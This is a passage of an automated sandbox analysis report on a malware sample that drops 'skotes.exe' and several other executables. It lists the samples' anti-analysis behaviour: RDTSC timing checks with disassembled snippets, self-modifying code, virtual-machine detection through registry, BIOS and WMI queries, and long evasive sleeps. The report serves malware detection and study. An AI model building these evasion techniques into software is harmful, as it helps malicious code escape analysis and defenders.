Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 34F427 second address: 34F42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 34F42B second address: 34F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 34F431 second address: 34F436 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4C9FFA second address: 4C9FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4C9FFE second address: 4CA00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4DCCF8FBC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CA327 second address: 4CA352 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4DCCCB3CD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F4DCCCB3CE7h 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CA352 second address: 4CA35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CA49F second address: 4CA4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC8DF second address: 4CC8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4DCCF8FBC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC8F3 second address: 4CC8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC8F8 second address: 4CC916 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DCCF8FBCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007F4DCCF8FBD4h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC916 second address: 4CC927 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4DCCCB3CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC927 second address: 4CC92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC92C second address: 4CC932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC932 second address: 4CC936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC97C second address: 4CC981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC981 second address: 4CC9E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F4DCCF8FBC6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F4DCCF8FBC8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dx, F892h 0x0000002d push 00000000h 0x0000002f jmp 00007F4DCCF8FBD2h 0x00000034 call 00007F4DCCF8FBC9h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F4DCCF8FBD6h 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CC9E9 second address: 4CCA00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F4DCCCB3CE4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F4DCCCB3CD6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCA00 second address: 4CCA18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F4DCCF8FBCCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCB2C second address: 4CCB5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sbb edx, 337C9016h 0x00000010 lea ebx, dword ptr [ebp+1245183Ch] 0x00000016 push edi 0x00000017 mov dword ptr [ebp+122D1F16h], edi 0x0000001d pop edi 0x0000001e xchg eax, ebx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCB5F second address: 4CCB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCBBE second address: 4CCBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007F4DCCCB3CE8h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCBE4 second address: 4CCC1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2B66h] 0x0000000e pushad 0x0000000f mov dword ptr [ebp+122D1F16h], ecx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 xor dword ptr [ebp+122D1CF0h], edi 0x0000001e push B07ED638h 0x00000023 pushad 0x00000024 jmp 00007F4DCCF8FBCAh 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F4DCCF8FBC6h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCC1A second address: 4CCC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4CCC1E second address: 4CCC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4F812A48h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F4DCCF8FBC8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D2E4Ah] 0x0000002e mov dword ptr [ebp+122D1D73h], ebx 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D1DBEh], ebx 0x0000003c push 00000000h 0x0000003e add edi, 7E39E5EDh 0x00000044 push 00000003h 0x00000046 add ecx, dword ptr [ebp+122D1F16h] 0x0000004c push AD776B3Eh 0x00000051 jng 00007F4DCCF8FBD4h 0x00000057 push eax 0x00000058 push edx 0x00000059 jg 00007F4DCCF8FBC6h 0x0000005f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4DF61E second address: 4DF624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EAE66 second address: 4EAE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EAE6C second address: 4EAE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EAFF4 second address: 4EAFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EB582 second address: 4EB5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4DCCF8FBC6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F4DCCF8FBD1h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 jbe 00007F4DCCF8FBCCh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EB5B3 second address: 4EB5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F4DCCCB3CD6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EB5C7 second address: 4EB5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EB5CB second address: 4EB5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EB5D1 second address: 4EB5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F4DCCF8FBD0h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EBCB8 second address: 4EBCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EBCBC second address: 4EBCCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4DCCF8FBCAh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 4EBCCC second address: 4EBCDE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4DCCCB3CDCh 0x00000008 jl 00007F4DCCCB3CD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C9086B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D185EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4F086B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 5785EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 688969 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 688A90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 68896F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 82F5C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 85CB02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Special instruction interceptor: First address: 8BFFCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Special instruction interceptor: First address: BFF81C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Special instruction interceptor: First address: DAED94 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04FB0AD5 rdtsc 0_2_04FB0AD5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4165
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3446
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4234
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2829
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe API coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7444 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2196 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2196 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5752 Thread sleep count: 300 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5752 Thread sleep time: -9000000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5808 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5808 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2896 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2896 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5752 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe TID: 8164 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe TID: 2060 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe TID: 8156 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe TID: 8160 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe TID: 5916 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6524 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 7_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 7_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F7978 FindFirstFileW,FindFirstFileW,free, 12_2_005F7978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 12_2_005F881C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005FB5E0 GetSystemInfo, 12_2_005FB5E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior
Source: file.exe, 00000000.00000000.1638460813.0000000000C72000.00000080.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1691482436.0000000000C72000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000000.1668966765.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000001.00000002.1724052545.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1724729033.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000000.1671951136.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2989176568.00000000004D2000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000000.2321874061.00000000004D2000.00000080.00000001.01000000.00000008.sdmp, 847ee125a0.exe, 847ee125a0.exe, 00000024.00000002.2991667736.0000000000813000.00000040.00000001.01000000.0000000F.sdmp, 6bf436adc7.exe, 00000025.00000002.2718373434.0000000000D85000.00000040.00000001.01000000.00000010.sdmp, 847ee125a0.exe, 00000027.00000002.2989826293.0000000000813000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000034.00000002.2911792267.000001EB27A04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: explorer.exe, 00000020.00000002.2565923861.000000000067B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWv
Source: firefox.exe, 00000034.00000002.2911792267.000001EB279C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2997566749.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2565923861.000000000067B000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2995066427.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2726906842.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2995066427.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001225000.00000004.00000020.00020000.00000000.sdmp, 6bf436adc7.exe, 00000025.00000002.2719200023.0000000001254000.00000004.00000020.00020000.00000000.sdmp, da3bdc2ac0.exe, 00000026.00000003.2816752361.0000000001691000.00000004.00000020.00020000.00000000.sdmp, da3bdc2ac0.exe, 00000026.00000003.2819991418.00000000016C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 6bf436adc7.exe, 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 847ee125a0.exe, 00000024.00000003.2726906842.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2995066427.0000000000C81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: skotes.exe, 00000006.00000002.2997566749.0000000000C08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+}
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
